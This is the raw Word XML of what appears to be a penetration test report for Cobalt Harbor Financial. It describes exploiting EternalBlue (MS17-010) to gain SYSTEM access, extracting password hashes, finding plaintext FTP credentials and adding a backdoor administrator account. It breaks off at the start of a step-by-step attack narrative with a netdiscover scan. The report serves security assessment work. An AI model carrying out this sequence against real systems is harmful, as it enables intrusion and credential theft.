          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1EEA2A" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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4.2 Other identified security vulnerabilities 5.0 Repair Suggestions and Long-Term Security Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0A42E5" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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5.1 Short-term Emergency Repair Measures (Immediate implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B52BC5" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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5.2 Long-term Strategic Security Reinforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DE82B" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBF1B62" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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 xml:space="preserve">Summary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E099C6" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA09687" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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 xml:space="preserve">References </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E2050" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5D2A03" w14:textId="148A59B8" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
        <w:t>APPENDIX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BDBAF7" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFEC926" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CDCDFF" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9F7CAB" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41688ACA" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC2F434" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302F91D3" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3643A708" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3E2302" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5566E17A" w14:textId="77777777" w:rsidR="0022306B" w:rsidRPr="0022306B" w:rsidRDefault="0022306B" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191FF887" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580FFC06" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BA5C8A" w14:textId="212E8245" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A461B" w14:textId="0C3FAD64" w:rsidR="000E19BF"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Our security team was commissioned by</w:t>
      </w:r>
      <w:r w:rsidR="0022306B" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0022306B" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financial</w:t>
      </w:r>
      <w:r w:rsidR="0022306B" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to conduct a comprehensive penetration test, aiming to assess your company's security defense capabilities in the face of a targeted, real-world simulated hacker attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CE690" w14:textId="6C66BA69"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The core </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>goal</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> of this simulated attack is</w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A5E047" w14:textId="60E52BE8" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify whether external attackers can break through the network boundary defense of </w:t>
      </w:r>
      <w:r w:rsidR="003C59FC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financial</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99E5F3" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Assess the actual business impact that a successful security breakthrough may have on the company, especially in terms of data confidentiality and the availability of core information systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17732A" w14:textId="0B4DD85E"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During the testing process, we comprehensively employed a variety of active reconnaissance and vulnerability scanning techniques. Through detailed analysis, we successfully located a Server running Windows Server 2012 R2 and discovered that it had a known remote code execution vulnerability rated as "critical" - MS17-010, </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>otherwise known as</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> "EternalBlue".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA14EF" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F1E646" w14:textId="6C91C836"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We successfully exploited the "</w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>" vulnerability and remotely obtained full control of the target server without any user credentials, with the AUTHORITY level being the highest authority NT AUTHORITY\SYSTEM of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC52EF" w14:textId="77777777" w:rsidR="000E19BF" w:rsidRPr="0022306B" w:rsidRDefault="000E19BF" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561BCFEA" w14:textId="77777777"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After obtaining the administrator privileges of the server, we were able to extract the password hash values of all local users, including the administrator account. What's more serious is that we found a text file in the file system of the server that stored login credentials for other services (FTP) in plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04041E9A" w14:textId="29AAF50A"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By creating a new administrator account on the target server, we successfully demonstrated how an attacker </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>establish a persistent backdoor after the initial intrusion, so that they can access and control the system again at any time in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E7C55B" w14:textId="77777777" w:rsidR="000E19BF" w:rsidRPr="0022306B" w:rsidRDefault="000E19BF" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D169E36" w14:textId="0F989F49"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The core vulnerability (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) discovered in this test poses an extremely serious risk to </w:t>
      </w:r>
      <w:r w:rsidR="003C59FC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financials’</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> information infrastructure. It allows any attacker who can access the server network to take full control of the server without any authorization. This may not only lead to catastrophic data </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leakage but</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> also make the server a springboard for attackers to penetrate the company's internal network, thereby threatening the network security of the entire enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3821AE5E" w14:textId="77777777" w:rsidR="000E19BF" w:rsidRPr="0022306B" w:rsidRDefault="000E19BF" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C05429" w14:textId="46CDD4BD" w:rsidR="00E436A8"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This report will provide a detailed account of the complete attack process, conduct a risk assessment of all discovered vulnerabilities using the Common Vulnerability Scoring System (CVSS), and offer a set of practical, phased repair suggestions and long-term risk avoidance strategies. We strongly recommend that the management of </w:t>
      </w:r>
      <w:r w:rsidR="00D9392E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financial</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> attach great importance to these findings and take immediate action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08697ADF" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519B658C" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51938FF6" w14:textId="7EF50EFA"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This </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">section </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the entire process of our step-by-step penetration and complete control of the target system from scratch in the form of a timeline. Each step contains the specific command to be executed, its principle and the resulting outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506C3FC" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F995871" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.1 Phase One: Reconnaissance and Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA870C" w14:textId="38EFE981" w:rsidR="000E19BF"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Our first step </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>was to</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009239B3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">discover the target host. We </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the surviving hosts within the target local area network segment. We used the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, which detects devices on the network by broadcasting ARP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7882BC62" w14:textId="69F9CC9F"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 Execute command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
